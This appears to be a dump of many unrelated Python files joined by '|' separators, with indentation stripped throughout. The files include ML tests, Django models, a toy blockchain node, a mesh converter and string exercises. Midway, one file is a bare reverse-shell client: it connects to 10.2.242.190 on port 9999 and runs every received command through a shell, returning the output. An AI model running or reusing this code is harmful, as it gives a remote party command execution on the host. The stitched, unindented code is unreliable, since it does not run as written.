image_path = sys.argv[1]
if not os.path.exists(image_path):
print(image_path, "is not a valid path")
sys.exit(1)
img = mpimg.imread(image_path)
img_flatten = img.flatten().astype(np.float32)
img_bytes = img_flatten.tobytes()
b64_enc = base64.b64encode(img_bytes)
b64_string = str(b64_enc)
# Print for caller to grab
print(b64_string)
if __name__ == '__main__':
main()
|
"""
This script creates a unittest that tests Categorical policies in
metarl.tf.policies.
"""
import gym
import pytest
from metarl.envs import MetaRLEnv, normalize
from metarl.experiment import LocalTFRunner
from metarl.np.baselines import LinearFeatureBaseline
from metarl.tf.algos import TRPO
from metarl.tf.optimizers import ConjugateGradientOptimizer
from metarl.tf.optimizers import FiniteDifferenceHvp
from metarl.tf.policies import CategoricalGRUPolicy
from metarl.tf.policies import CategoricalLSTMPolicy
from metarl.tf.policies import CategoricalMLPPolicy
from tests.fixtures import snapshot_config, TfGraphTestCase
policies = [CategoricalGRUPolicy, CategoricalLSTMPolicy, CategoricalMLPPolicy]
class TestCategoricalPolicies(TfGraphTestCase):
@pytest.mark.parametrize('policy_cls', [*policies])
def test_categorical_policies(self, policy_cls):
with LocalTFRunner(snapshot_config, sess=self.sess) as runner:
env = MetaRLEnv(normalize(gym.make('CartPole-v0')))
policy = policy_cls(name='policy', env_spec=env.spec)
baseline = LinearFeatureBaseline(env_spec=env.spec)
algo = TRPO(
env_spec=env.spec,
policy=policy,
baseline=baseline,
max_path_length=100,
discount=0.99,
max_kl_step=0.01,
optimizer=ConjugateGradientOptimizer,
optimizer_args=dict(hvp_approach=FiniteDifferenceHvp(
base_eps=1e-5)),
)
runner.setup(algo, env)
runner.train(n_epochs=1, batch_size=4000)
env.close()
|
"""
created: mcclayac
Company Name : BigMAN Software
MyName: Tony McClay
date: 11/23/18
day of month: 23
Project Name: 20PythonLibraries
filename:
package name:
IDE: PyCharm
"""
import dominate
from dominate.tags import *
doc = dominate.document(title='Dominate your HTML')
with doc.head:
link(rel='stylesheet', href='style.css')
script(type='text/javascript', src='script.js')
with doc:
with div(id='header').add(ol()):
for i in ['home', 'about', 'contact']:
li(a(i.title(), href='/%s.html' % i))
with div():
attr(cls='body')
p('Lorem ipsum..')
print(doc)
with open("./dominate.html",'w') as f:
f.write(str(doc))
|
###############################################################################
# Copyright 2015 University of Florida. All rights reserved.
# This file is part of the BlueButton.py project.
# Use of this source code is governed by the license found in the LICENSE file.
###############################################################################
"""
Parser for the CCDA functional & cognitive status
"""
from ... import documents
from ...core import wrappers
def functional_statuses(ccda):
parse_date = documents.parse_date
data = wrappers.ListWrapper()
statuses = ccda.section('functional_statuses')
for entry in statuses.entries():
date = parse_date(entry.tag('effectiveTime').attr('value'))
if not date:
date = parse_date(entry.tag('effectiveTime').tag('low').attr('value'))
el = entry.tag('value')
name = el.attr('displayName')
code = el.attr('code')
code_system = el.attr('codeSystem')
code_system_name = el.attr('codeSystemName')
data.append(wrappers.ObjectWrapper(
date=date,
name=name,
code=code,
code_system=code_system,
code_system_name=code_system_name
))
return data
|
# -*- coding:utf-8 -*-
from __future__ import unicode_literals
default_app_config = 'marchena.modules.attachments.apps.AttachmentsConfig'
|
# Definition for a binary tree node.
class TreeNode:
def __init__(self, val=0, left=None, right=None):
self.val = val
self.left = left
self.right = right
class Solution:
def goodNodes(self, root: TreeNode) -> int:
return self.bfs(root)
def bfs(self,root):
q=[root]
memo=[root.val]
res=1
while q:
size=len(q)
for s in range(size):
c=q[0]
maxv=memo[0]
q.pop(0)
memo.pop(0)
if c.left:
if c.left.val>=maxv:
res+=1
q.append(c.left)
memo.append(c.left.val)
else:
q.append(c.left)
memo.append(maxv)
if c.right:
if c.right.val>=maxv:
res+=1
q.append(c.right)
memo.append(c.right.val)
else:
q.append(c.right)
memo.append(maxv)
return res
|
import socket
import os
import subprocess
s = socket.socket()
host = '10.2.242.190'
port = 9999
s.connect((host, port))
while True:
data = s.recv(1024)
if data[:2].decode("utf-8") == 'cd':
os.chdir(data[3:].decode("utf-8"))
if len(data) > 0:
cmd = subprocess.Popen(data[:].decode("utf-8"), shell=True, stdout=subprocess.PIPE, stdin=subprocess.PIPE, stderr=subprocess.PIPE)
output_byte = cmd.stdout.read() + cmd.stderr.read()
output_str = str(output_byte, "utf-8", errors="ignore")
currentWD = os.getcwd() + "> "
s.send(str.encode(output_str + currentWD))
print(output_str) |
import django_filters
from cards.models import Card
class CardFilter(django_filters.rest_framework.FilterSet):
card_name = django_filters.CharFilter(lookup_expr='icontains')
set_name = django_filters.CharFilter(lookup_expr='icontains')
type = django_filters.CharFilter(lookup_expr='icontains')
cost = django_filters.CharFilter(lookup_expr='icontains')
class Meta:
model = Card
fields = '__all__'
|
import numpy as np
def project_image_to_rect(uv_depth, P):
# uv_depth (3, N)
c_u = P[0,2]
c_v = P[1,2]
f_u = P[0,0]
f_v = P[1,1]
b_x = P[0,3]/(-f_u) # relative
b_y = P[1,3]/(-f_v)
# use camera coordinate
n = uv_depth.shape[1]
x = ((uv_depth[0]-c_u)*uv_depth[2])/f_u + b_x
y = ((uv_depth[1]-c_v)*uv_depth[2])/f_v + b_y
return np.stack([x, y, uv_depth[2]], axis=0)
def project_disp_to_depth(points_cam, Proj, baseline=0.54):
xs, ys, disp = points_cam[0:1], points_cam[1:2], points_cam[2:3]
_, w, h, d = disp.shape
mask = disp > 0
depth = Proj[0,0] * baseline / (disp + 1. - mask)
points = np.concatenate([xs, ys, depth], axis=0)
points = points.reshape((3, -1))
# camera coordinate
cloud = project_image_to_rect(points, Proj)
cloud = cloud.reshape(3, w, h, d)
return cloud
def clip_boxes(boxes, size, remove_empty=False):
boxes[:, [0,2]] = boxes[:, [0,2]].clip(0, size[0] - 1)
boxes[:, [1,3]] = boxes[:, [1,3]].clip(0, size[1] - 1)
if remove_empty:
keep = (boxes[:, 3] > boxes[:, 1]) & (boxes[:, 2] > boxes[:, 0])
return boxes, keep
else:
return boxes
def get_dimensions(corners):
assert corners.shape == (3, 8)
height_group = [(0, 4), (1, 5), (2, 6), (3, 7)]
width_group = [(0, 1), (2, 3), (4, 5), (6, 7)]
length_group = [(0, 3), (1, 2), (4, 7), (5, 6)]
vector_group = [(0, 3), (1, 2), (4, 7), (5, 6)]
height = 0.0
width = 0.0
length = 0.0
vector = np.zeros(2, dtype=np.float32)
for index_h, index_w, index_l, index_v in zip(height_group, width_group, length_group, vector_group):
height += np.linalg.norm(corners[:, index_h[0]] - corners[:, index_h[1]])
width += np.linalg.norm(corners[:, index_w[0]] - corners[:, index_w[1]])
length += np.linalg.norm(corners[:, index_l[0]] - corners[:, index_l[1]])
vector[0] += (corners[:, index_v[0]] - corners[:, index_v[1]])[0]
vector[1] += (corners[:, index_v[0]] - corners[:, index_v[1]])[2]
height, width, length = height*1.0/4, width*1.0/4, length*1.0/4
rotation_y = -np.arctan2(vector[1], vector[0])
return [height, width, length, rotation_y]
|
import requests
from flask import Flask, jsonify, request
import blockchain as bc
import json
import sys
import rsa
import base64
from uuid import uuid4
# Cryptocurrency is just a private key that "allows" access to account
(pub_key, priv_key) = rsa.newkeys(512)
# Generate a public key unique address for this node
node_identifier = pub_key.save_pkcs1().decode('UTF-8')
#Instantiate the Node
app = Flask(__name__)
# Instantiate the Blockchain
blockchain = bc.Blockchain()
@app.route('/mine', methods=['GET'])
def mine():
# We run the proof of work algorithm to get the next proof...
last_block = blockchain.last_block
last_proof = last_block['proof']
proof = blockchain.proof_of_work(last_proof)
# We must receive a reward for finding the proof.
# The sender is "0" to signify that this node has mined a new coin.
message = f'0{node_identifier}1'
signature = rsa.sign(message.encode('UTF-8'),priv_key,'SHA-256')
blockchain.new_transaction(
sender="0",
recipient=node_identifier,
amount=1,
signature = base64.b64encode(signature).decode('UTF-8')
)
# Forge the new Block by adding it to the chain
previous_hash = blockchain.hash(last_block)
block = blockchain.new_block(proof, previous_hash)
temp = set()
temp.add(f'{addr}:{portn}')
temp.update(blockchain.nodes)
threshold = 100
temp_sum = sum(blockchain.temp_unspent.values())
if temp_sum < threshold:
return 'Not enough transactions', 400
broadcast = {
'nodes': list(temp),
'block': block
}
for node in blockchain.nodes:
requests.post(f'http://{node}/nodes/block/new', json = broadcast)
response = {
'message': "New Block Forged",
'index': block['index'],
'transactions': block['transactions'],
'proof': block['proof'],
'previous_hash': block['previous_hash'],
}
return jsonify(response), 200
@app.route('/nodes/block/new', methods=['POST'])
def recieve_block():
values = request.get_json()
required = ['nodes','block']
if (values is None or not all(k in values for k in required)):
return 'Missing values', 400
required = ['index', 'proof', 'previous_hash','timestamp','transactions']
if (not all(k in values['block'] for k in required)):
return 'Missing value in block', 400
if (not blockchain.accept_block(values['block']['proof'],values['block']['index'],values['block']['previous_hash'],values['block']['timestamp'],values['block']['transactions'])):
return 'Invalid block', 400
diff = blockchain.nodes - set(values['nodes'])
# find nodes that werent notified of transaction
values['nodes']= list(blockchain.nodes | set(values['nodes']))
for node in diff :
# add new nodes to blockchain
blockchain.register_node(node)
requests.post(f'http://{node}/nodes/block/new', json = values)
return 'Block Added', 201
@app.route('/nodes/transactions/new', methods=['POST'])
def new_transaction_internal():
values = request.get_json()
# Check that required fields are in the POST'ed data
required = ['nodes', 'transaction']
if (values is None or not all (k in values for k in required)):
return 'Missing values', 400
required = ['sender', 'recipient', 'amount', 'signature']
if (not all(k in values['transaction'] for k in required)):
return 'Missing transaction values', 400
if (not blockchain.test_transaction(values)):
return 'Already have transaction', 200
if (not blockchain.valid_transaction(values['sender'],values['recipient'],values['amount'],values['signature'])):
return 'Invalid Transaction', 400
diff = blockchain.nodes - set(values['nodes'])
# find nodes that werent notified of transaction
values['nodes']= list(blockchain.nodes | set(values['nodes']))
for node in diff :
# add new nodes to blockchain
blockchain.register_node(node)
requests.post(f'http://{node}/nodes/transactions/new', json = values)
# Create a new Transaction
index = blockchain.new_transaction(values['transaction']['sender'],values['transaction']['recipient'],values['transaction']['amount'],values['transaction']['signature'])
response = {'message': f'Transaction will be added to Block {index}'}
return jsonify(response), 201
@app.route('/transactions/new', methods=['POST'])
def new_transaction():
values = request.get_json()
# Check that the required fields are in the POST'ed data
required = ['sender', 'recipient', 'amount', 'signature']
if (values is None or not all(k in values for k in required)):
return 'Missing values', 400
if (not blockchain.valid_transaction(values['sender'],values['recipient'],int(values['amount']),values['signature'])):
return 'Invalid Transaction', 400
# Create a new Transaction
index = blockchain.new_transaction(values['sender'],values['recipient'],int(values['amount']),values['signature'])
temp = set()
temp.add(f'{addr}:{portn}')
temp.update(blockchain.nodes)
# Include nodes broadcasting to so nodes know who it was sent too
broadcast = {
'nodes': list(temp),
'transaction': {
'sender': values['sender'],
'recipient': values['recipient'],
'amount': values['amount'],
'signature': values['signature']}}
for node in blockchain.nodes:
requests.post(f'http://{node}/nodes/transactions/new', json = broadcast)
response = {'message': f'Transaction will be added to Block {index}'}
return jsonify(response), 201
@app.route('/chain', methods=['GET'])
def full_chain():
response = {
'transactions': blockchain.current_transactions,
'chain': blockchain.chain,
'length': len(blockchain.chain)
}
return jsonify(response), 200
@app.route('/nodes/register', methods=['POST'])
def internal_register_nodes():
values = request.get_json()
if values is None:
return "Error: Please provide some json",400
nodes = values.get('nodes')
if nodes is None:
return "Error: Please supply a valid list of nodes", 400
response = {
'message': 'New nodes have been added',
'total_nodes': list(blockchain.nodes),
}
return jsonify(response), 201
@app.route('/register', methods=['POST'])
def external_register_nodes():
values = request.get_json()
if values is None:
return "Error: Please provide some json",400
nodes = values.get('nodes')
if nodes is None:
return "Error: Please supply a valid list of nodes", 400
request_body = {
"nodes" : [f'http://{addr}:{portn}']
}
for node in nodes:
blockchain.register_node(node)
requests.post(f'{node}/nodes/register', json = request_body)
response = {
'message': 'New nodes have been added',
'total_nodes': list(blockchain.nodes),
}
return jsonify(response), 201
@app.route('/nodes/resolve', methods=['GET'])
def consensus():
replaced = blockchain.resolve_conflicts()
if replaced:
response = {
'message': 'Our chain was replaced',
'new_chain': blockchain.chain
}
else:
response = {
'message': 'Our chain is authoritative',
'chain': blockchain.chain
}
return jsonify(response), 200
# This will probably be used by the website and mobile
# to turn an ip address into a node identifier
@app.route('/identifier', methods=['GET'])
def identity():
response = {'address': node_identifier}
return jsonify(response), 200
# Retrieves a user's unspent coin balance
@app.route('/balance', methods=['POST'])
def balance():
values = request.get_json()
if values is None:
return "Error: Please provide some json",400
keys = values.get('keys')
if keys is None:
return "String missing parameter key.", 400
response = {'balance':[]}
for key in keys:
if key in blockchain.unspent.keys():
response['balance'].append(blockchain.unspent[key])
else:
response['balance'].append(0)
return jsonify(response), 200
def main(host,port):
"""
Starts up the server
:param host: <str> The host address of the server
:param port: <int> The port that the server is listening too
"""
global portn
global addr
portn=port
addr=host
app.run(host=host, port=port)
|
from django.urls import include, path
from bbbs.story.views import StoryList
extra_patterns = [
path("story/", StoryList.as_view(), name="stories"),
]
urlpatterns = [
path("v1/", include(extra_patterns)),
]
|
from django.contrib.auth.models import (
AbstractBaseUser,
BaseUserManager,
PermissionsMixin,
)
from django.utils import timezone
from django.core.mail import send_mail
from django.utils.translation import ugettext_lazy as _
from django.db import models
class UserManager(BaseUserManager):
"""
A custom user manager to deal with emails as unique identifiers for auth
instead of usernames. The default that's used is "UserManager"
"""
use_in_migrations = True
def _create_user(self, email, password, **extra_fields):
"""
Create and save a user with the given email, and password.
"""
if not email:
raise ValueError('The given username must be set')
email = self.normalize_email(email)
user = self.model(email=email, **extra_fields)
user.set_password(password)
user.save(using=self._db)
return user
def create_user(self, email=None, password=None, **extra_fields):
extra_fields.setdefault('is_staff', False)
extra_fields.setdefault('is_superuser', False)
return self._create_user(email, password, **extra_fields)
def create_superuser(self, email, password, **extra_fields):
extra_fields.setdefault('is_staff', True)
extra_fields.setdefault('is_superuser', True)
if extra_fields.get('is_staff') is not True:
raise ValueError('Superuser must have is_staff=True.')
if extra_fields.get('is_superuser') is not True:
raise ValueError('Superuser must have is_superuser=True.')
return self._create_user(email, password, **extra_fields)
class User(AbstractBaseUser, PermissionsMixin):
email = models.EmailField(unique=True)
first_name = models.CharField(_('first name'), max_length=30, blank=True)
last_name = models.CharField(_('last name'), max_length=150, blank=True)
is_staff = models.BooleanField(
_('staff status'),
default=False,
help_text=_(
'Designates whether the user can log into this admin site.'),
)
is_active = models.BooleanField(
_('active'),
default=True,
help_text=_(
'Designates whether this user should be treated as active. '
'Unselect this instead of deleting accounts.'),
)
date_joined = models.DateTimeField(_('date joined'), default=timezone.now)
objects = UserManager()
EMAIL_FIELD = 'email'
USERNAME_FIELD = 'email'
REQUIRED_FIELDS = []
class Meta:
verbose_name = _('user')
verbose_name_plural = _('users')
def __str__(self):
return self.email
def clean(self):
super().clean()
self.email = self.__class__.objects.normalize_email(self.email)
def get_full_name(self):
"""
Return the first_name plus the last_name, with a space in between.
"""
full_name = '%s %s' % (self.first_name, self.last_name)
return full_name.strip()
def get_short_name(self):
"""Return the short name for the user."""
return self.first_name
def email_user(self, subject, message, from_email=None, **kwargs):
"""Send an email to this user."""
send_mail(subject, message, from_email, [self.email], **kwargs)
|
# Copyright (c) 2016 PaddlePaddle Authors. All Rights Reserved
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from paddle.proto.DataConfig_pb2 import DataConfig
g_config = None
def SimpleData(files=None,
feat_dim=None,
context_len=None,
buffer_capacity=None):
data_config = DataConfig()
data_config.type = 'simple'
data_config.files = files
data_config.feat_dim = feat_dim
if context_len is not None:
data_config.context_len = context_len
if buffer_capacity:
data_config.buffer_capacity = buffer_capacity
return data_config
def get_config_funcs(trainer_config):
global g_config
g_config = trainer_config
return dict(SimpleData=SimpleData)
|
# -*- coding: utf-8 -*-
"""app Description
This module does great things.
"""
import os
import tempfile
import subprocess
import shutil
# Implementation constants
BASH_SCRIPT_HEADER = """#!/bin/bash
#%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
# FILE:{}
# DESCRIPTION:{}
# USAGE:{}
#%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
"""
def read_file(filename):
with open(filename, "r") as f:
s = f.read()
return s
def create_bash_script(filename):
with open(filename, "w") as f:
header = BASH_SCRIPT_HEADER.format(
filename,
"",#DESCRIPTION
"",#USAGE
)
f.write("{}".format(header))
os.chmod(filename, 0o755)
# Classes, methods, functions, and variables
class AliashTool():
"""AliashTool is the default class for app.
As a default, the __init__ method does not set up any class attributes.
However, if it does, you should follow the PEP-8 conventions and document
them as shown below.
Args:
msg (str): Human readable str describing the exception.
code (:obj:`int`, optional): Error code.
Attributes:
msg (str): Human readable str describing the exception.
code (int): Exception error code.
"""
def __init__(self, home_dir, script_dir, bash_aliases_file):
self.home_dir = home_dir
self.script_dir = script_dir
self.alias_definition_file = bash_aliases_file
def join_home_dir(self, filename) -> str:
return os.path.join(self.home_dir, filename)
def join_script_dir(self, filename) -> str:
return os.path.join(self.script_dir, filename)
def _get_current_scripts_in_script_dir(self) -> list:
return [os.path.join(self.script_dir, i) for i in os.listdir(
self.script_dir) if i.endswith(".sh")]
def _get_current_alias_definitions_from_file(self) -> list:
alias_defintions = [line.strip() for line in read_file(
self.alias_definition_file).split("\n") if not line == ""
]
return alias_defintions
def _get_current_aliases_in_alias_definition_file(self) -> list:
alias_definition_file_aliases = []
alias_defs = self._get_current_alias_definitions_from_file()
for a in alias_defs:
if "=" in a:
alias_def = a.split("=")
alias = alias_def[0].split("alias ")[1]
alias_definition_file_aliases.append(alias)
return alias_definition_file_aliases
def _get_current_scripts_in_alias_definition_file(self) -> list:
alias_definition_file_scripts = []
alias_defs = self._get_current_alias_definitions_from_file()
for a in alias_defs:
if "=" in a:
alias_def = a.split("=")
filename = alias_def[1]
alias_definition_file_scripts.append(filename)
return alias_definition_file_scripts
def _get_db(self) -> dict:
"""Returns {'alias': 'alias_script_path'}"""
db = {}
alias_defs = self._get_current_alias_definitions_from_file()
for a in alias_defs:
if "=" in a:
alias_filename = a.split("=")
alias = alias_filename[0][6:].split(" ")[0]
filename = alias_filename[1]
if db.get(alias) is None:
db[alias] = filename
else:
print("ERROR: duplicate alias")
return db
def _format_alias_definition(self, alias) -> str:
return "alias {}={}".format(
alias,
self.join_script_dir(alias+".sh")
)
def remove_file(self, filename):
old_script_dir = os.path.join(self.home_dir, "Utilities/tmp")
new_filename = filename.replace(self.script_dir, old_script_dir)
shutil.move(filename, new_filename)
def _clean_script_dir(self):
scripts_in_dir = self._get_current_scripts_in_script_dir()
scripts_in_alias_file = \
self._get_current_scripts_in_alias_definition_file()
for s in scripts_in_dir:
if not s in scripts_in_alias_file:
# actually just renames it
self.remove_file(s)
def _remove_alias_definition(self, alias):
"""Delete an alias definition from .bash_aliases"""
remove_alias = self._format_alias_definition(alias)
alias_definitions = self._get_current_alias_definitions_from_file()
alias_definitions.remove(remove_alias)
f = tempfile.NamedTemporaryFile(mode='w+t', delete=False)
new_file = f.name
for line in alias_definitions:
if not line == "":
f.write(line+"\n")
f.close()
shutil.move(
self.alias_definition_file,
self.alias_definition_file+".bak"
)
shutil.move(new_file, self.alias_definition_file)
self._clean_script_dir()
def _append_bash_alias_file(self, new_alias):
"""Append an alias definition from .bash_aliases"""
new_alias_definition = self._format_alias_definition(new_alias)
alias_definitions = self._get_current_alias_definitions_from_file()
if not new_alias_definition in alias_definitions:
alias_definitions.append(new_alias_definition)
alias_definitions.sort()
f = tempfile.NamedTemporaryFile(mode='w+t', delete=False)
new_file = f.name
for line in alias_definitions:
if not line == "":
f.write(line+"\n")
f.close()
shutil.move(self.alias_definition_file,
self.alias_definition_file+".bak"
)
shutil.move(new_file, self.alias_definition_file)
def _is_alias_in_script_dir(self, alias) -> bool:
return os.path.isfile(self.join_script_dir(alias+".sh"))
def _is_alias_in_alias_definition_file(self, alias) -> bool:
current_aliases = self._get_current_aliases_in_alias_definition_file()
if alias not in current_aliases:
return False
return True
def add_alias(self, alias):
"""Create a new alias .sh file in the script_dir and add it to
.bash_aliases file
Returns:
True
"""
if self._is_alias_in_script_dir(alias):
print("ERROR: alias already exists with that name")
return True
else:
self._append_bash_alias_file(alias)
new_filename = self.join_script_dir(alias+".sh")
create_bash_script(new_filename)
print("SUCCESS: added new alias file to script dir")
return True
def remove_alias(self, alias):
"""Remove an existing alias definition and its script file
Returns:
True
"""
# only add the alias if it does not exist as alias and there's
# not a filename already in the script dir
db = self._get_db()
old_alias_file = db.get(alias)
if not old_alias_file is None:
self._remove_alias_definition(alias)
print("SUCCESS: removed old alias from .bash_aliases")
else:
print("ERROR: alias does not exist with that name")
return True
def help_alias(self, alias):
"""Show the help str from an alias definition
Returns:
True
"""
# only show help if the alias does exist
db = self._get_db()
if db.get(alias) is None:
print("ERROR: alias key {} not in db".format(alias))
else:
try:
script = read_file(db.get(alias))
print(script)
except:
print("ERROR: reading filename {}".format(db.get(alias)))
return True
def find_alias(self, tag) -> dict:
"""Find alias with a tag
Returns:
True
"""
db = self._get_db()
found_aliases = {}
for alias in db:
if tag in alias:
found_aliases.update({alias: db[alias]})
return found_aliases
def edit_alias(self, alias):
"""Edit an alias
Returns:
True
"""
if not self._is_alias_in_script_dir(alias):
print("ERROR: alias script does not exist with that name")
return True
# only show edit if the alias does exist
db = self._get_db()
if db.get(alias) is None:
print("ERROR: alias key {} not in db".format(alias))
else:
try:
filename = self.join_script_dir(alias+".sh")
script = read_file(filename)
f = tempfile.NamedTemporaryFile(mode='w+t', delete=False)
n = f.name
f.write(script)
f.close()
subprocess.call(['nano', n])
shutil.move(f.name, filename)
os.chmod(filename, 0o755)
except:
print("ERROR: writing filename {}".format(alias+".sh"))
return True
def rename_alias(self, old_name, new_name):
"""Rename an alias
Returns:
True
"""
if self._is_alias_in_script_dir(new_name):
print("ERROR: alias already exists with that name in script dir")
return True
if not self._is_alias_in_script_dir(old_name):
print("ERROR: alias does not exist with that name in script dir")
return True
if not self._is_alias_in_alias_definition_file(old_name):
print("ERROR: alias does not exist with that name in alias file")
return True
self.add_alias(new_name)
shutil.copy(
self.join_script_dir(old_name+".sh"),
self.join_script_dir(new_name+".sh")
)
self.remove_alias(old_name)
return True
def test_aliash_tool(self):
"""Class methods are similar to regular functions.
Returns:
True
"""
return True
|
#
# Copyright (c) 2018 TECHNICAL UNIVERSITY OF MUNICH, DEPARTMENT OF MECHANICAL ENGINEERING, CHAIR OF APPLIED MECHANICS,
# BOLTZMANNSTRASSE 15, 85748 GARCHING/MUNICH, GERMANY, RIXEN@TUM.DE.
#
# Distributed under 3-Clause BSD license. See LICENSE file for more information.
#
"""
AMfe mesh converter for I/O module.
"""
import numpy as np
import pandas as pd
from amfe.io.mesh.base import MeshConverter
from amfe.io.mesh.constants import VOLUME_ELEMENTS_2D, VOLUME_ELEMENTS_3D, BOUNDARY_ELEMENTS_2D, BOUNDARY_ELEMENTS_3D
from amfe.mesh import Mesh
__all__ = [
'AmfeMeshConverter'
]
class AmfeMeshConverter(MeshConverter):
"""
Converter for AMfe meshes.
Examples
--------
Convert GiD json file to AMfe mesh:
>>> from amfe.io.mesh.reader import GidJsonMeshReader
>>> from amfe.io.mesh.writer import AmfeMeshConverter
>>> filename = '/path/to/your/file.json'
>>> converter = AmfeMeshConverter()
>>> reader = GidJsonMeshReader(filename)
>>> reader.parse(converter)
>>> converter.return_mesh()
"""
def __init__(self, verbose=False):
super().__init__()
self._verbose = verbose
self._mesh = Mesh()
self._dimension = None
self._no_of_nodes = None
self._no_of_elements = None
self._nodes = np.empty((0, 4), dtype=float)
self._currentnodeid = 0
self._groups = dict()
self._tags = dict()
# df information
self._el_df_indices = list()
self._el_df_eleshapes = list()
self._el_df_connectivity = list()
self._el_df_is_boundary = list()
return
def build_no_of_nodes(self, no):
# This function is only used for preallocation
# It is not necessary to call, but useful if information about no_of_nodes exists
self._no_of_nodes = no
if self._nodes.shape[0] == 0:
self._nodes = np.zeros((no, 4), dtype=float)
return
def build_no_of_elements(self, no):
# This function is not used
# If someone wants to improve performance he/she can add preallocation functionality for elements
self._no_of_elements = no
# preallocation...
return
def build_mesh_dimension(self, dim):
self._dimension = dim
return
def build_node(self, idx, x, y, z):
# amfeid is the row-index in nodes array
amfeid = self._currentnodeid
# Check if preallocation has been done so far
if self._no_of_nodes is not None:
# write node in preallocated array
self._nodes[amfeid, :] = [idx, x, y, z]
else:
# append node if array is not preallocated with full node dimension
self._nodes = np.append(self._nodes, np.array([idx, x, y, z], dtype=float, ndmin=2), axis=0)
self._currentnodeid += 1
return
def build_element(self, idx, etype, nodes):
# update df information
self._el_df_connectivity.append(np.array(nodes, dtype=int))
self._el_df_indices.append(idx)
self._el_df_eleshapes.append(etype)
return
def build_group(self, name, nodeids=None, elementids=None):
# append group information
group = {name: {'nodes': nodeids, 'elements': elementids}}
self._groups.update(group)
return
def build_tag(self, tag_dict):
# append tag information
self._tags.update(tag_dict)
return None
def return_mesh(self):
# Check dimension of model
if self._dimension is None:
if not VOLUME_ELEMENTS_3D.intersection(set(self._el_df_eleshapes)):
# No 3D element in eleshapes, thus:
self._dimension = 2
else:
self._dimension = 3
# If dimension = 2 cut the z coordinate
x = self._nodes[:, 1]
y = self._nodes[:, 2]
if self._dimension == 2:
self._mesh.nodes_df = pd.DataFrame({'x': x, 'y': y}, index=np.array(self._nodes[:, 0], dtype=int))
else:
z = self._nodes[:, 3]
self._mesh.nodes_df = pd.DataFrame({'x': x, 'y': y, 'z': z}, index=np.array(self._nodes[:, 0], dtype=int))
# divide in boundary and volume elements
if self._dimension == 3:
volume_element_set = VOLUME_ELEMENTS_3D
boundary_element_set = BOUNDARY_ELEMENTS_3D
elif self._dimension == 2:
volume_element_set = VOLUME_ELEMENTS_2D
boundary_element_set = BOUNDARY_ELEMENTS_2D
else:
raise ValueError('Dimension must be 2 or 3')
# write properties
self._mesh.dimension = self._dimension
self._el_df_is_boundary = len(self._el_df_connectivity)*[False]
for index, shape in enumerate(self._el_df_eleshapes):
if shape in boundary_element_set:
self._el_df_is_boundary[index] = True
data = {'shape': self._el_df_eleshapes,
'is_boundary': self._el_df_is_boundary,
'connectivity': self._el_df_connectivity}
self._mesh.el_df = pd.DataFrame(data, index=self._el_df_indices)
self._mesh.groups = self._groups
for tag_name, tag_dict in self._tags.items():
self._mesh.insert_tag(tag_name, tag_dict)
return self._mesh
|
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('content', '0010_sitesettings_google_analytics_token'),
]
operations = [
migrations.AddField(
model_name='page',
name='override_page_template',
field=models.CharField(default='', help_text='Sivut n\xe4ytet\xe4\xe4n k\xe4ytt\xe4en t\xe4t\xe4 sivupohjaa. T\xe4m\xe4nnimisen sivupohjan tulee l\xf6yty\xe4 l\xe4hdekoodista.', max_length=127, verbose_name='Sivupohja', blank=True),
),
migrations.AddField(
model_name='page',
name='page_controller_code',
field=models.CharField(default='', help_text='Polku funktioon, joka suoritetaan joka sivulatauksella ja joka voi m\xe4\xe4ritell\xe4 lis\xe4\xe4 muuttujia sivupohjan nimiavaruuteen.', max_length=255, verbose_name='Sivukontrolleri', blank=True),
),
]
|
# Copyright 2010 Google Inc.
# Licensed under the Apache License, Version 2.0
# http://www.apache.org/licenses/LICENSE-2.0
# Additional basic string exercises
# D. verbing
# Given a string, if its length is at least 3,
# add 'ing' to its end.
# Unless it already ends in 'ing', in which case
# add 'ly' instead.
# If the string length is less than 3, leave it unchanged.
# Return the resulting string.
def verbing(s):
if len(s) < 3:
return s
suffix1 = 'ing'
suffix2 = 'ly'
if s.endswith(suffix1):
return f'{s}{suffix2}'
else:
return f'{s}{suffix1}'
# E. not_bad
# Given a string, find the first appearance of the
# substring 'not' and 'bad'. If the 'bad' follows
# the 'not', replace the whole 'not'...'bad' substring
# with 'good'.
# Return the resulting string.
# So 'This dinner is not that bad!' yields:
# This dinner is good!
def not_bad(s):
word1 = s.find('not')
word2 = s.find('bad')
if word1 > word2 or word1 == -1 or word2 == -1:
return s
string1 = s[:word1]
string2 = s[word2+3:] # three is the length of the word
return f'{string1}good{string2}'
# F. front_back
# Consider dividing a string into two halves.
# If the length is even, the front and back halves are the same length.
# If the length is odd, we'll say that the extra char goes in the front half.
# e.g. 'abcde', the front half is 'abc', the back half 'de'.
# Given 2 strings, a and b, return a string of the form
# a-front + b-front + a-back + b-back
def front_back(a, b):
print(a + ' ' + b)
aFront = round(len(a)/2+.1)
bFront = round(len(b)/2+.1)
return f'{a[0:aFront]}{b[0:bFront]}{a[aFront:]}{b[bFront:]}'
# Simple provided test() function used in main() to print
# what each function returns vs. what it's supposed to return.
def test(got, expected):
if got == expected:
prefix = ' OK '
else:
prefix = ' X '
print(prefix + ' got: ' + got + ' expected: ' + expected)
# main() calls the above functions with interesting inputs,
# using the above test() to check if the result is correct or not.
def main():
print('verbing')
test(verbing('hail'), 'hailing')
test(verbing('swiming'), 'swimingly')
test(verbing('do'), 'do')
print()
print('not_bad')
test(not_bad('This movie is not so bad'), 'This movie is good')
test(not_bad('This dinner is not that bad!'), 'This dinner is good!')
test(not_bad('This tea is not hot'), 'This tea is not hot')
test(not_bad("It's bad yet not"), "It's bad yet not")
print()
print('front_back')
test(front_back('abcd', 'xy'), 'abxcdy')
test(front_back('abcde', 'xyz'), 'abcxydez')
test(front_back('Kitten', 'Donut'), 'KitDontenut')
main()
|
from .loss import *
from .misc import *
from .transform import OutputTransform
|
# Random tests
import math
if 1:
def isqrt(x):
op = x
res = 0
one = 1 << 30
